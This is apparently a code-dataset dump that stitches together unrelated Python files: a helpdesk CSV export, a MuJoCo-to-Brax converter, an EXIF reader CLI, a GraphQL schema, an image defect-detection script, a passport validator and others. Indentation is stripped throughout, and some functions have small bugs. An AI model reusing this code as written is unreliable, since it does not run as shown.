csv_contents = "Ticket_ID,Title,Submitted By,Date,Replies,Total Days,Institute,Domain,Assigned,URL\n"
for ticket in ticket_query:
if hasattr(ticket.assigned, "name"):
_name = ticket.assigned.name
else:
_name = ticket.user.name
csv_contents += (
f"{ticket.id_zfill},"
f"{clean_csv_data(ticket.title)},"
f'"{ticket.user.name}",'
f'{ticket.date_added.strftime("%Y-%m-%d")},'
f"{ticket.num_replies},"
f"{ticket.total_days},"
f"{clean_csv_data(ticket.institute.institute)},"
f"{clean_csv_data(ticket.domain.domain)},"
f"{_name},"
f'{app.config["base_url"]}'
f'{url_for("flicket_bp.ticket_view", ticket_id=ticket.id)}\n'
)
return Response(
csv_contents,
mimetype="text/csv",
headers={"Content-disposition": f"attachment; filename={file_name}"},
)
@flicket_bp.route(app.config["FLICKET"] + "my_tickets/", methods=["GET", "POST"])
@flicket_bp.route(
app.config["FLICKET"] + "my_tickets/<int:page>/", methods=["GET", "POST"]
)
@login_required
def my_tickets(page=1):
response = tickets_view(page, is_my_view=True)
return response
| StarcoderdataPython |
74068 | <filename>brax/tools/mujoco_converter.py
# Copyright 2021 The Brax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command line tool for converting Mujoco models to Brax."""
from typing import Sequence
from absl import app
from absl import flags
from absl import logging
from brax.io import file
from brax.tools import mujoco
from google.protobuf import text_format
FLAGS = flags.FLAGS
flags.DEFINE_string('xml_model_path', None,
'Path of the Mujoco XML model to import.')
flags.DEFINE_string('config_path', None, 'Path of the output config.')
flags.DEFINE_bool('add_collision_pairs', True,
'Adds the collision pairs to the config.')
# System parameters. See brax/physics/config.proto for more information.
flags.DEFINE_float('angular_damping', -0.05,
'Angular velocity damping applied to each body.')
flags.DEFINE_float(
'baumgarte_erp', 0.1,
'How aggressively interpenetrating bodies should push away each another.')
flags.DEFINE_float('dt', 0.02, 'Time to simulate each step, in seconds.')
flags.DEFINE_float('friction', 0.6,
'How much surfaces in contact resist translation.')
flags.DEFINE_integer('substeps', 4,
'Substeps to perform to maintain numerical stability.')
flags.DEFINE_bool('ignore_unsupported_joints', False,
'Ignores unsupported joints.')
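# Example invocation (hypothetical paths, shown only to illustrate the flags
# defined above):
#   python mujoco_converter.py --xml_model_path=/tmp/ant.xml \
#       --config_path=/tmp/ant_config.pbtxt --dt=0.01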
def main(argv: Sequence[str]) -> None:
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
# Read the Mujoco model.
filename = FLAGS.xml_model_path
with file.File(filename) as f:
logging.info('Loading mujoco model from %s', filename)
xml_string = f.read()
# Convert the model.
m = mujoco.MujocoConverter(
xml_string,
add_collision_pairs=FLAGS.add_collision_pairs,
ignore_unsupported_joints=FLAGS.ignore_unsupported_joints)
config = m.config
# Add the default options.
config.angular_damping = FLAGS.angular_damping
config.baumgarte_erp = FLAGS.baumgarte_erp
config.dt = FLAGS.dt
config.friction = FLAGS.friction
config.substeps = FLAGS.substeps
# Save the config.
if FLAGS.config_path:
text_proto = text_format.MessageToString(config)
with file.File(FLAGS.config_path, mode='w+') as f:
f.write(text_proto)
if __name__ == '__main__':
app.run(main)
| StarcoderdataPython |
90025 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#
# Library to extract Exif information from digital camera image files.
# https://github.com/ianare/exif-py
#
#
# Copyright (c) 2002-2007 <NAME>
# Copyright (c) 2007-2014 <NAME> and contributors
# Copyright (c) 2020- Cyb3r Jak3
#
# See LICENSE.txt file for licensing information
# See ChangeLog.rst file for all contributors and changes
#
"""
Runs Exif tag extraction in command line.
"""
import sys
import argparse
import timeit
from exifreader.tags import DEFAULT_STOP_TAG, FIELD_TYPES
from exifreader import process_file, exif_log, __version__
logger = exif_log.get_logger()
def show_version():
"""Show the program version."""
print('Version %s on Python %s' % (__version__, sys.version[0:5]))
sys.exit(0)
def parse_arguments():
"""Parses command line arguments"""
parser = argparse.ArgumentParser(
description="Library to extract Exif information from digital camera image files.")
parser.add_argument('files', nargs='*', default=None,
help='Path of photos to check.')
parser.add_argument(
"-v", "--version", action="store_true", default=False,
help="Display version information and exit.")
parser.add_argument(
"-q", "--quick", action="store_false", dest="detailed", default=True,
help="Do not process MakerNotes")
parser.add_argument(
"-t", "--stop-tag", default=DEFAULT_STOP_TAG,
help="Stop processing when this tag is retrieved."
)
parser.add_argument(
"-s", "--strict", action="store_true", default=False,
help="Run in strict mode (stop on errors)."
)
parser.add_argument(
"-d", "--debug", action="store_true", default=False,
help="Run in debug mode"
)
return parser.parse_args()
def main():
"""Parse command line options/arguments and execute."""
args = parse_arguments()
if args.version:
show_version()
exif_log.setup_logger(args.debug)
# output info for each file
for filename in args.files:
file_start = timeit.default_timer()
try:
img_file = open(str(filename), 'rb')
except IOError:
logger.error("'%s' is unreadable", filename)
continue
logger.info("Opening: %s", filename)
tag_start = timeit.default_timer()
# get the tags
data = process_file(
img_file,
stop_tag=args.stop_tag,
details=args.detailed,
strict=args.strict,
debug=args.debug)
tag_stop = timeit.default_timer()
if not data:
logger.warning("No EXIF information found\n")
continue
if 'JPEGThumbnail' in data:
logger.info('File has JPEG thumbnail')
del data['JPEGThumbnail']
if 'TIFFThumbnail' in data:
logger.info('File has TIFF thumbnail')
del data['TIFFThumbnail']
tag_keys = list(data.keys())
tag_keys.sort()
for i in tag_keys:
logger.info('%s (%s): %s', i, FIELD_TYPES[data[i].field_type][2], data[i].printable)
file_stop = timeit.default_timer()
logger.debug("Tags processed in %s seconds", tag_stop - tag_start)
logger.debug("File processed in %s seconds", file_stop - file_start)
print("")
if __name__ == '__main__':
main()
| StarcoderdataPython |
122553 | <gh_stars>1-10
from queue import PriorityQueue as PQueue
N = int(input())
C = int(input())
V = int(input())
S = list(map(lambda x: int(x)-1, input().split()))
T = list(map(lambda x: int(x)-1, input().split()))
Y = list(map(int, input().split()))
M = list(map(int, input().split()))
E = [[] for _ in range(N)]
for f, t, cost, time in zip(S, T, Y, M):
E[t].append((f, cost, time))
INF = 10**7
dp = [[INF] * (C+1) for _ in range(N)]
for i in range(C+1):
dp[0][i] = 0
for t in range(N):
for j in range(C+1):
for f, cost, time in E[t]:
if j >= cost and dp[t][j] > dp[f][j-cost] + time:
dp[t][j] = dp[f][j-cost] + time
print(min(dp[N-1]) if min(dp[N-1]) != INF else -1)
| StarcoderdataPython |
1657839 | <gh_stars>10-100
#!/usr/bin/env python3
from __future__ import print_function
# dsl2.py
import sys
import importlib
def get_args(dsl_args):
"""return args, kwargs"""
args = []
kwargs = {}
for dsl_arg in dsl_args:
if '=' in dsl_arg:
k, v = dsl_arg.split('=', 1)
kwargs[k] = v
else:
args.append(dsl_arg)
return args, kwargs
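# Illustration (not in the original source): get_args(['alpha', 'k=v']) returns
# (['alpha'], {'k': 'v'}), i.e. bare tokens become positional arguments and
# key=value tokens become keyword arguments for the DSL call below.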
# the source file is the 1st argument to the script
if len(sys.argv) != 2:
print('usage: %s <src.dsl>' % sys.argv[0])
sys.exit(1)
sys.path.insert(0, '/Users/nathan/code/dsl/modules')
with open(sys.argv[1], 'r') as file:
for line in file:
line = line.strip()
if not line or line[0] == '#':
continue
parts = line.split()
mod = importlib.import_module(parts[0])
args, kwargs = get_args(parts[2:])
getattr(mod, parts[1])(*args, **kwargs)
| StarcoderdataPython |
120359 | from django.contrib.auth import get_user_model
import graphene
from graphene import relay, ObjectType, AbstractType
from graphene_django import DjangoObjectType
from graphene_django.filter import DjangoFilterConnectionField
from graphene.types.datetime import DateTime
from conference.event.models import Conference, SponsorshipLevel, Sponsor, Room, Session
from conference.profiles.models import SocialHandle
class ConfNode(DjangoObjectType):
class Meta:
model = Conference
filter_fields = [
'slug',
]
interfaces = (relay.Node,)
class SponsorshipLevelNode(DjangoObjectType):
class Meta:
model = SponsorshipLevel
filter_fields = ['conference', 'id']
interfaces = (relay.Node,)
class SocialNode(DjangoObjectType):
class Meta:
model = SocialHandle
interfaces = (relay.Node,)
class UserNode(DjangoObjectType):
image = graphene.String(source='image')
class Meta:
model = get_user_model()
filter_fields = ['id']
interfaces = (relay.Node,)
class SponsorNode(DjangoObjectType):
logo_url = graphene.String(source='logo_url')
class Meta:
model = Sponsor
only_fields = ('name', 'url', 'description', 'level', 'active', 'logo',
'logo_url')
filter_fields = ['id', 'active']
interfaces = (relay.Node,)
class RoomNode(DjangoObjectType):
class Meta:
model = Room
filter_fields = ['conference', 'id']
interfaces = (relay.Node,)
class SessionNode(DjangoObjectType):
end = DateTime(source='end')
start_str = graphene.String(source='start_str')
end_str = graphene.String(source='end_str')
date_str = graphene.String(source='date_str')
class Meta:
model = Session
filter_fields = ['conference', 'id', 'status', 'stype', 'conference__slug']
interfaces = (relay.Node,)
class Query(AbstractType):
all_confs = DjangoFilterConnectionField(ConfNode)
all_levels = DjangoFilterConnectionField(SponsorshipLevelNode)
all_sponsors = DjangoFilterConnectionField(SponsorNode)
all_rooms = DjangoFilterConnectionField(RoomNode)
all_sessions = DjangoFilterConnectionField(SessionNode)
all_keynotes = DjangoFilterConnectionField(SessionNode)
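# A sketch of a query this schema could serve once plugged into a graphene
# Schema (field names assume graphene's default snake_case -> camelCase
# conversion; the filter arguments come from the filter_fields declared above):
#   query {
#     allSponsors(active: true) {
#       edges { node { name url logoUrl } }
#     }
#   }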
| StarcoderdataPython |
3264880 | # Test the denoising autoencoder using noise-corrupted images
import torch
import torchvision
from torch import nn
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.utils import save_image
from torchvision.datasets import MNIST
import glob
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
import os
import cv2
import pySQI
import pyGTemplate
import testAAE
import time
import region
import scipy.io as scio
# import Imgprocessing
class AEGenerator(nn.Module):
def __init__(self):
super(AEGenerator, self).__init__()
self.encoder = nn.Sequential(
nn.Conv2d(1,32, 5, stride=2, padding=2),
nn.ReLU(True),# 64*128*128
nn.Conv2d(32,32, 5, stride=2, padding=2),
nn.ReLU(True),# 128*64*64
nn.Conv2d(32,64, 5, stride=2, padding=2),
nn.ReLU(True),# 256*32*32
nn.Conv2d(64,64, 5, stride=2, padding=2),
nn.ReLU(True),# 256*16*16
nn.Conv2d(64,128, 5, stride=2, padding=2),
nn.ReLU(True)# 512*8*8
)
self.fc1 = nn.Sequential(
nn.Linear(128*8*8, 128),
nn.ReLU(True)
)
self.fc2 = nn.Sequential(
nn.Linear(128, 128 * 8 * 8),
nn.ReLU(True)
)
self.decoder = nn.Sequential(
nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1), # b, 16, 5, 5
nn.ReLU(True), # 256 * 16 * 16
nn.ConvTranspose2d(64, 64, 4, stride=2, padding=1), # b, 16, 5, 5
nn.ReLU(True), # 256 * 32 * 32
nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1), # b, 16, 5, 5
nn.ReLU(True), # 128 * 64 * 64
nn.ConvTranspose2d(32, 32, 4, stride=2, padding=1), # b, 16, 5, 5
nn.ReLU(True), # 64 * 128 * 128
nn.ConvTranspose2d(32, 1, 4, stride=2, padding=1), # b, 16, 5, 5
nn.Sigmoid() # 1 * 256 * 256
)
def forward(self, x):
x = self.encoder(x)
x = x.view(x.size(0), -1)
x = self.fc1(x)
x = self.fc2(x)
x = x.view(x.size(0), 128, 8, 8)
x = self.decoder(x)
return x
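# Shape sketch (inferred from the layer strides above, not in the original
# source): a 1x256x256 input is encoded through five stride-2 convolutions down
# to 128x8x8, squeezed through the 128-d fully connected bottleneck, and decoded
# back to 1x256x256, e.g.
#   AEGenerator()(torch.randn(1, 1, 256, 256)).shape == (1, 1, 256, 256)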
def preprocessing(total_num, sample_id, threshold, exposure, write_flag):
sobel_mask_vect = []
src_vect = []
sobel_x =np.array([[-1, 0, 1],[-1, 0, 1],[-1, 0, 1]], dtype=np.float32)
sobel_y =np.array([[1, 1, 1],[0, 0, 0],[-1, -1, -1]], dtype=np.float32)
new_img = np.zeros((256,256), np.uint8)
for pic_num in range(1, total_num):
if write_flag:
src_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '/' + str(pic_num) + '.jpg'
output_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '/' + str(pic_num) + '.png'
IN_src_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '_IN/' + 'SQI' + '/' + '{:02d}'.format(pic_num) + '.png'
# output_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '_IN/' + 'TT' + '/' + '{:02d}'.format(pic_num) + '.png'
# region_file = './roi/region_' + str(pic_num) + '.png'
# print(src_file)
img = cv2.imread(src_file)
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
m,n = img.shape
img = img[0:n]
new_img[3:253,3:253] = img
cv2.imwrite(output_file, new_img)
new_img_copy = new_img.copy()
# IN_img = cv2.imread(IN_src_file)
# IN_img = cv2.cvtColor(IN_img, cv2.COLOR_BGR2GRAY)
# src_vect.append(IN_img)
else:
src_file = '../Dataset/defect_img/{:02}.png'.format(pic_num)
# src_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '/' + str(pic_num) + '.png'
# IN_src_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '_IN/' + 'SQI' + '/' + '{:02d}'.format(pic_num) + '.png'
new_img = cv2.imread(src_file)
new_img = cv2.cvtColor(new_img,cv2.COLOR_BGR2GRAY)
# IN_img = cv2.imread(IN_src_file)
# IN_img = cv2.cvtColor(IN_img, cv2.COLOR_BGR2GRAY)
# src_vect.append(IN_img)
sobel_mag = np.zeros(new_img.shape, np.float)
# sobel_angle = np.zeros(new_img.shape, np.float)
# quantized_angle = np.zeros(new_img.shape, np.uint8)
sobel_mask = np.zeros(new_img.shape, np.uint8)
# img_Guassian = cv2.GaussianBlur(new_img,(5,5),0)
# img_Guassian.astype(np.uint8)
# m,n = img_Guassian.shape
# m,n = new_img.shape
# for i in range(2,m-1):
# for j in range(2,n-1):
# Gx = np.sum(new_img[i-1:i+2, j-1:j+2] * sobel_x)
# Gy = np.sum(new_img[i-1:i+2, j-1:j+2] * sobel_y)
# sobel_mag[i,j] = math.sqrt(math.pow(Gx,2) + math.pow(Gy,2))
# sobel_angle[i,j] = math.atan2(Gy, Gx) * 180 / math.pi
# # quantized_angle[i,j] = quantizeAngle(sobel_angle[i,j])
# if sobel_mag[i,j] >= threshold:
# sobel_mask[i,j] = 1
# contour = angleFilter(sobel_mask, quantized_angle)
# contour = cv2.blur(contour, (3,3))
        # sobelx = cv2.Sobel(new_img,cv2.CV_32F,1,0)  # default ksize=3
# sobely = cv2.Sobel(new_img,cv2.CV_32F,0,1)
sobelx = cv2.filter2D(new_img, cv2.CV_32F, sobel_x)
sobely = cv2.filter2D(new_img, cv2.CV_32F, sobel_y)
sobel_mag = np.sqrt(pow(sobelx,2) + pow(sobely,2))
# sobel_angle = np.arctan2(sobely,sobelx) * 180 /math.pi
sobel_mag = cv2.convertScaleAbs(sobel_mag)
_, sobel_mask = cv2.threshold(sobel_mag, threshold, 255, 0)
# contour = angleFilter(sobel_mask, sobel_angle)
# contour = cv2.blur(contour, (3,3))
# sobel_mask = cv2.blur(sobel_mask, (3,3))
# contour_vect.append(contour)
# cv2.imshow('sobel', sobel_mask)
# cv2.waitKey(0)
sobel_mask_vect.append(sobel_mask)
return sobel_mask_vect
def Contour_extraction(img_files, model):
width = 256
height = 256
x_truth = np.reshape(img_files, (len(img_files), width, height, 1)) # adapt this if using `channels_first` image data format
    # first add an extra dimension
# user_emb_dims = np.expand_dims(self.user_emb, axis=0)
# user_emb_dims.shape
x_test = x_truth
x_truth = np.array(x_truth)
x_truth = x_truth.astype('float32') / 255.
x_test = np.array(x_test)
x_test = x_test.astype('float32') / 255.
x_truth = np.reshape(x_truth, (len(x_truth),1, width, height)) # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test),1, width, height)) # adapt this if using `channels_first` image data format
batch_test=torch.Tensor(x_test)
img = Variable(batch_test).cuda()
# ===================forward=====================
output = model(img)
output_imgs = output.cpu().data.numpy()
noise_imgs = img.cpu().data.numpy()
output_imgs = output_imgs * 255
output_imgs = output_imgs.transpose(0,2,3,1)
noise_imgs = noise_imgs * 255
noise_imgs = noise_imgs.transpose(0,2,3,1)
contours = []
for i,singleimg in enumerate(output_imgs):
_,singleimg = cv2.threshold(singleimg, 170, 255, 0)
contours.append(singleimg)
return contours
def Template_method():
total_num = 28
foldernum = 11
# sample_id = 0
threshold = 160
# exposure = 6
# write_flag = False
evaluate_flag = False
extract_CF = False
# W = 30
# H = 20
Wh = 0.3
Wl = 0.5
Wh_vect = np.array([Wh])
Wl_vect = np.array([Wl])
if(evaluate_flag):
Wh_vect = np.linspace(0.1,0.9, 85, endpoint= True)
Wl_vect = np.linspace(0.1,0.9, 85, endpoint= True)
# print(Wh_vect)
ParaName = 'parameter.npy'
# ---------------- Load model ----------------------
model_id = 802
model_is_trained_parallel = True
if not os.path.exists('../Test_Image'):
os.mkdir('../Test_Image')
if not os.path.exists('../Test_Image/input'):
os.mkdir('../Test_Image/input')
if not os.path.exists('../Test_Image/output'):
os.mkdir('../Test_Image/output')
# if not os.path.exists('../Detection_results'):
# os.mkdir('../Detection_results')
# Setting Image Propertie
model = AEGenerator().cuda()
if model_is_trained_parallel: #如果使用服务器并行训练的模型需要加上以下的步骤
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
model = nn.DataParallel(model,device_ids=[0])
model.to(device)
# model.load_state_dict(torch.load('./model/aug/conv_aae_epoch_2990.pth'))
checkpoint = torch.load('../Model/GAN/aegan_epoch_{}.pth'.format(model_id))
# here, checkpoint is a dict with the keys you defined before
model.load_state_dict(checkpoint['model'])
F1_evaluate = []
Precise_evaluate = []
Recall_evaluate = []
index = 0
total_time = []
sqi_time = []
ROI_time = []
detection_time = []
initial_template = pyGTemplate.inittempGeneration(ParaName, [256,256])
for Wl_idx, Wl in enumerate(Wl_vect):
# st = time.time()
IN_img_vect = []
GT_img_vect = []
sobel_mask_vect = []
sobel_x =np.array([[-1, 0, 1],[-1, 0, 1],[-1, 0, 1]], dtype=np.float32)
sobel_y =np.array([[1, 1, 1],[0, 0, 0],[-1, -1, -1]], dtype=np.float32)
# new_img = np.zeros((256,256), np.uint8)
Precise = []
Recall = []
F1 = []
for folder_num in range(1, foldernum+1):
Precise_mean = []
Recall_mean = []
F1_mean = []
for pic_num in range(1, total_num):
# src_file = '../data/sample_' + str(sample_id) + '/{:03d}'.format(exposure) + '/' + str(pic_num) + '.png'
if extract_CF:
src_file = '../Dataset/origin_img/{:02}.png'.format(pic_num)
else:
src_file = '../Dataset/defect_img/{:02}/{:02}.png'.format(folder_num, pic_num)
index += 1
gt_file = '../Dataset/Mask_img/{:02}/{:02}.png'.format(folder_num, pic_num)
img_in = cv2.imread(src_file)
img_in = cv2.cvtColor(img_in, cv2.COLOR_BGR2GRAY)
img_gt = cv2.imread(gt_file)
img_gt = cv2.cvtColor(img_gt, cv2.COLOR_BGR2GRAY)
sqi_start = time.time()
imgout = pySQI.SQI(img_in)
sqi_end = time.time()
sqi_time.append(sqi_end - sqi_start)
# IN_img_vect.append(imgout)
# GT_img_vect.append(img_gt)
sobel_mag = np.zeros(img_in.shape, np.float)
sobel_mask = np.zeros(img_in.shape, np.uint8)
sobelx = cv2.filter2D(img_in, cv2.CV_32F, sobel_x)
sobely = cv2.filter2D(img_in, cv2.CV_32F, sobel_y)
sobel_mag = np.sqrt(pow(sobelx,2) + pow(sobely,2))
sobel_mag = cv2.convertScaleAbs(sobel_mag)
_, sobel_mask = cv2.threshold(sobel_mag, threshold, 255, 0)
sobel_mask_vect.append(sobel_mask)
contour = Contour_extraction([sobel_mask], model)
single_img = contour[0].astype(np.uint8)
mask = region.regionGenerate(single_img)
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3, 3))
eroded = cv2.erode(mask,kernel)
eroded_2 = cv2.erode(eroded,kernel)
eroded_3 = cv2.erode(eroded_2,kernel)
roi = cv2.bitwise_and(imgout, imgout, mask=eroded)
sub = eroded - eroded_3
roi[(sub>0)*(roi<80)] = 0
eroded[(sub>0)] = 0
if extract_CF:
region_file = '../roi/region_{:02d}'.format(pic_num) + '.png'
mask_file = '../Template/bin_mask/region_{:02d}'.format(pic_num) + '.png'
cv2.imwrite(region_file, roi)
cv2.imwrite(mask_file, eroded)
detect_start = time.time()
ROI_time.append(detect_start - sqi_end)
defect_mask, defect_rgb = pyGTemplate.TempGenAndDetection(ParaName, Wh, Wl, initial_template, imgout, roi, eroded)
detect_end = time.time()
detection_time.append(detect_end - detect_start)
total_time.append(detect_end - sqi_start)
# print('Detection cost:{:.4f}'.format(end - start))
# result_file = '../Results/defect_rgb_{:02d}'.format(pic_num) + '.png'
mask_file = '../Results/mask/{:03d}.png'.format(index)
result_file = '../Results/rgb/{:03d}.png'.format(index)
if not (extract_CF and evaluate_flag):
cv2.imwrite(mask_file, defect_mask)
cv2.imwrite(result_file, defect_rgb)
# cv2.imwrite(result_file, defect_rgb)
# cv2.imwrite(mask_file, defect_mask)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3, 3))
# defect_mask = cv2.dilate(defect_mask, kernel)
# result = np.zeros(defect_mask.shape, np.uint8)
# result[(defect_mask_>0)*(sobel_mask>0)+(defect_mask>0)] = 255
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(5, 5))
# result = cv2.dilate(result, kernel)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(7, 7))
# result = cv2.erode(result, kernel)
one = np.ones(defect_mask.shape, np.uint8)
Inter = one[(defect_mask>0)*(img_gt>0)]
Union = one[(defect_mask>0)+(img_gt>0)]
IoU = np.sum(Inter)/np.sum(Union)
if np.sum(Inter) == 0 and np.sum(Union) == 0 :
IoU = 1
TP = np.sum(one[(defect_mask>0)*(img_gt>0)])
FP = np.sum(one[(defect_mask>0)*(img_gt==0)])
FN = np.sum(one[(defect_mask==0)*(img_gt>0)])
precise = TP/(TP+FP)
recall = TP/(TP+FN)
if (TP+FP)==0:
precise = 0
if (TP+FN)==0:
recall = 0
if recall==0 and precise==0:
F1 = 0
else:
F1 = 2*(precise*recall)/(precise + recall)
print('IoU : {:.4f} Precise : {:.4f} Recall : {:.4f} F1 : {:.4f}'.format(IoU, precise, recall, F1))
# if precise:
Precise_mean.append(precise)
# if recall:
Recall_mean.append(recall)
# if F1:
F1_mean.append(F1)
# cv2.imshow('mask', defect_mask)
# cv2.imshow('defect', defect_rgb)
# cv2.waitKey(0)
# ed = time.time()
# print("IN_Cost:{:.5f}".format(ed-st))
# time_start = time.time()
# sobel_mask_vect = preprocessing(total_num, sample_id, threshold, exposure, write_flag)
# time_end = time.time()
# print('Proprecessing time cost:{:.3f}'.format(time_end - time_start))
# contour_vect = Contour_extraction(sobel_mask_vect)
# print('AAE time cost:{:.3f}'.format(time.time() - time_end))
# for i, singleimg in enumerate(contour_vect):
# # singleimg = np.squeeze(singleimg, axis=(2,))
# singleimg = singleimg.astype(np.uint8)
# src = IN_img_vect[i]
# # cv2.imshow('src',src)
# # cv2.waitKey(0)
# region_file = '../roi/region_{:02d}'.format(i) + '.png'
# mask_file = '../Template/bin_mask/region_{:02d}'.format(i) + '.png'
# mask = region.regionGenerate(singleimg)
# kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3, 3))
# eroded = cv2.erode(mask,kernel)
# eroded_2 = cv2.erode(eroded,kernel)
# eroded_3 = cv2.erode(eroded_2,kernel)
# roi = cv2.bitwise_and(src, src, mask=eroded)
# sub = eroded - eroded_3
# roi[(sub>0)*(roi<80)] = 0
# eroded[(sub>0)*(roi<80)] = 0
# # background = cv2.bitwise_not(eroded)
# # cv2.imwrite(region_file, roi)
# # cv2.imwrite(mask_file, eroded)
# # cv2.imshow('region', roi+background)
# # cv2.waitKey(0)
# #--------------------defect detection
# # cv2.imshow('roi', roi)
# # cv2.imshow('eroded', eroded)
# # cv2.waitKey(0)
# start = time.time()
# defect_mask, defect_rgb = pyGTemplate.TempGenAndDetection(ParaName, Wh, Wl, roi, eroded)
# end = time.time()
# print('Detection cost:{:.4f}'.format(end - start))
# result_file = '../Results/defect_rgb_{:02d}'.format(i) + '.png'
# mask_file = '../Results/defect_mask_{:02d}'.format(i) + '.png'
# # cv2.imwrite(result_file, defect_rgb)
# # cv2.imwrite(mask_file, defect_mask)
# cv2.imshow('mask', defect_mask)
# cv2.waitKey(0)
# print('Totally time cost:{:.3f}'.format(time.time() - st))
Precise_mean = np.mean(Precise_mean)
Recall_mean = np.mean(Recall_mean)
F1_mean = np.mean(F1_mean)
print('Mean Precise : {:.4f} Mean Recall : {:.4f} Mean F1 : {:.4f}'.format(Precise_mean, Recall_mean, F1_mean))
Precise_evaluate.append(Precise_mean)
Recall_evaluate.append(Recall_mean)
F1_evaluate.append(F1_mean)
Precise = np.max(Precise_mean)
Recall = np.max(Recall_mean)
F1 = np.max(F1_mean)
Precise_evaluate = np.array(Precise)
Recall_evaluate = np.array(Recall)
F1_evaluate = np.array(F1)
data = np.vstack((Precise_evaluate, Recall_evaluate, F1_evaluate))
mean_data = np.mean(data,1)
sqi_mean = np.mean(sqi_time)
ROI_mean = np.mean(ROI_time)
detection_mean = np.mean(detection_time)
total_mean = np.mean(total_time)
if(evaluate_flag):
mat = 'Wl_evaluate_data.mat'
scio.savemat(mat, {'data': data})
else:
with open('result.txt', 'w') as f:
f.write('Mean Precise : {:.4f} Mean Recall : {:.4f} Mean F1 : {:.4f} \n'.format(mean_data[0], mean_data[1], mean_data[2]))
f.write('Avg SQI time_cost: {:.4f} Avg RoI_extract time_cost: {:.4f} Avg detection time_cost: {:.4f} \n'.format(sqi_mean, ROI_mean, detection_mean))
f.write('Total time cost: {:.4f}'.format(total_mean))
if __name__ == "__main__":
Template_method()
| StarcoderdataPython |
7107 | import enum
class Status(enum.Enum):
"""Status enumeration."""
ACTIVE = 'ACTIVE'
DISABLED = 'DISABLED'
ARCHIVED = 'ARCHIVED'
DELETED = 'DELETED'
class ProgressStatus(enum.Enum):
"""Enumeration indicates the different
stages of the progress made on an engagement,
job or task."""
NOT_STARTED = 'NOT STARTED'
RUNNING = 'RUNNING'
IN_REVIEW = 'IN REVIEW'
REVIEWED = 'REVIEWED'
CLOSED = 'CLOSED'
| StarcoderdataPython |
1742807 | passports = []
def parseFields(passport):
parsedPassport = {}
fields = passport[:-1].split(" ")
for field in fields:
pair = field.split(":", 1)
parsedPassport[pair[0]] = pair[1]
return parsedPassport
def validatePassportFields(passport):
return bool(validatePassportFieldBirthYear(passport["byr"])
and validatePassportFieldIssueYear(passport["iyr"])
and validatePassportFieldExpirationYear(passport["eyr"])
and validatePassportFieldHight(passport["hgt"])
and validatePassportFieldHairColour(passport["hcl"])
and validatePassportFieldEyeColour(passport["ecl"])
and validatePassportFieldPassportId(passport["pid"]))
def validatePassportFieldBirthYear(birthYear):
birthYear = int(birthYear)
if birthYear < 1920 or birthYear > 2002:
print("Invalid birth year: {}".format(passport["byr"]))
return False
return True
def validatePassportFieldIssueYear(issueYear):
issueYear = int(issueYear)
if issueYear < 2010 or issueYear > 2020:
print("Invalid issue year: {}".format(passport["iyr"]))
return False
return True
def validatePassportFieldExpirationYear(expirationYear):
expirationYear = int(expirationYear)
if expirationYear < 2020 or expirationYear > 2030:
print("Invalid expiration year: {}".format(passport["eyr"]))
return False
return True
def validatePassportFieldHight(hight):
if len(hight) < 4:
print("Invalid height: {}".format(hight))
return False
hightUnit = hight[-2:]
hightQuantity = int(hight[:-2])
if hightUnit == "cm":
if hightQuantity < 150 or hightQuantity > 193:
print("Invalid height: {}".format(hight))
return False
elif hightUnit == "in":
if hightQuantity < 59 or hightQuantity > 76:
print("Invalid height: {}".format(hight))
return False
else:
return False
return True
def validatePassportFieldHairColour(hairColour):
if len(hairColour) != 7:
print("Invalid hair colour: {}".format(hairColour))
return False
if hairColour[0] != "#":
print("Invalid hair colour: {}".format(hairColour))
return False
for character in hairColour[1:]:
if character not in ("0123456789abcdef"):
print("Invalid hair colour: {}".format(hairColour))
return False
return True
def validatePassportFieldEyeColour(eyeColour):
if eyeColour not in ("amb", "blu", "brn", "gry", "grn", "hzl", "oth"):
print("Invalid eye colour: {}".format(eyeColour))
return False
return True
def validatePassportFieldPassportId(passportId):
try:
int(passportId)
except ValueError:
return False
if len(passportId) > 9:
print("Invalid passport ID: {}".format(passportId))
return False
return True
with open("input.txt") as f:
passport = ""
line = f.readline()
while True:
if line == "\n":
passports.append(parseFields(passport))
passport = ""
else:
passport += line.replace("\n", " ")
line = f.readline()
if not line:
passports.append(parseFields(passport))
break
requiredFields = ("byr", "ecl", "eyr", "hcl", "hgt", "iyr", "pid")
validPassports = 0
for passport in passports:
invalidPassport = False
for field in requiredFields:
if field not in passport:
invalidPassport = True
break
if invalidPassport:
continue
if validatePassportFields(passport):
validPassports += 1
print(validPassports)
| StarcoderdataPython |
1733170 | <reponame>hyjiacan/restful-dj
from types import MethodType
class RouteMeta:
"""
    Route metadata
"""
def __init__(self,
handler: MethodType,
func_args,
route_id=None,
module=None,
name=None,
kwargs=None):
"""
        :param handler: the route handler function object
        :param func_args: the parameter list of the route handler function
        :param route_id: the route ID, composed from the route's related information
        :param module: the module value specified on the decorator
        :param name: the name value specified on the decorator
        :param kwargs: the other keyword arguments specified on the decorator
"""
self._handler = handler
self._func_args = func_args
